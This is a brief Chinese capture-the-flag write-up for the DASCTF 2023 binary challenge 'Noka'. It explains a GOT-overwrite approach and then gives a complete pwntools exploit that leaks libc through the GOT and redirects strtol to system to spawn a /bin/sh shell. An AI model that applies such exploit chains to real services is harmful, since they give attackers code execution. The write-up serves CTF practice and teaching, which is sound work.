Noka

DASCTF_2023_6_二进制专项 Noka

考完期末，开始复现

利用gift将malloc的got表改成read_num，以此控制add函数中赋值给tmp_ptr的指针，让指针指向malloc的got表项进行泄露libc，再修改strtol的got为system函数地址即可

想不明白为啥零解

EXP

from pwn import *

context.terminal=['tmux','splitw','-h']
context.arch='amd64'
context.log_level='debug'

ELFpath='/home/wjc/Desktop/noka' 
libcpath='/home/wjc/glibc-all-in-one-master/libs/2.35-0ubuntu3.1_amd64/libc.so.6'

p=process(ELFpath)
#p=remote('118.24.118.158',9999)

e=ELF(ELFpath)
libc=ELF(libcpath)

rut=lambda s :p.recvuntil(s,timeout=0.1)
ru=lambda s :p.recvuntil(s)
r=lambda n :p.recv(n)
sl=lambda s :p.sendline(s)
sls=lambda s :p.sendline(str(s))
ss=lambda s :p.send(str(s))
s=lambda s :p.send(s) 
uu64=lambda data :u64(data.ljust(8,'\x00'))
it=lambda :p.interactive()
b=lambda :gdb.attach(p)
bp=lambda bkp:gdb.attach(p,'b *'+str(bkp))
get_leaked_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,'\x00'))

LOGTOOL={}
def LOGALL():
    log.success("**** all result ****")
    for i in LOGTOOL.items():
        log.success("%-20s%s"%(i[0]+":",hex(i[1])))

def get_base(a, text_name):
    text_addr = 0
    libc_base = 0
    for name, addr in a.libs().items():
        if text_name in name:
            text_addr = addr
        elif "libc" in name:
            libc_base = addr 
    return text_addr, libc_base
def debug():
    global p
    text_base, libc_base = get_base(p, 'noka')
    script = '''
    set $text_base = {}
    set $libc_base = {}
    b*0x401305
    '''.format(text_base, libc_base)
    
    #b mprotect
    #b *($text_base+0x0000000000000000F84)
    #b *($text_base+0x000000000000134C)
    # b *($text_base+0x0000000000000000001126)
    #dprintf *($text_base+0x04441),"%c",$ax
    #dprintf *($text_base+0x04441),"%c",$ax
    #0x12D5
    #0x04441
    #b *($text_base+0x0000000000001671)
    gdb.attach(p, script)

def ptrxor(pos,ptr):
    return p64((pos >> 12) ^ ptr)

def add(fake_addr,content):
    ru('> ')
    sl('1')
    ru('size: ')
    sl("8")
    sleep(0.1)
    sl(str(fake_addr));
    ru('text: ')
    s(content)

def show():
    ru('> ')
    sl('2')

def gift(addr,value):
    ru('> ')
    sl('3')
    ru('Break Point:')
    sl(str(addr))
    ru('Break Value:')
    sl(str(value))

tmp_ptr=0x4040b0
read_num=0x401254
strtol_got=e.got['strtol']
malloc_got=e.got['malloc']
read_got=e.got['read']

gift(malloc_got,read_num)
add(tmp_ptr,p64(read_got))
show()

libcbase=get_leaked_libc()-libc.symbols['read']
LOGTOOL['libcbase']=libcbase
system_addr=libcbase+libc.symbols['system']
LOGTOOL['system']=system_addr
str_bin_sh=libcbase+libc.search('/bin/sh').next()
LOGTOOL['str_bin_sh']=str_bin_sh


#debug()
LOGALL()

add(strtol_got,p64(system_addr))

sl('/bin/sh\x00')

it()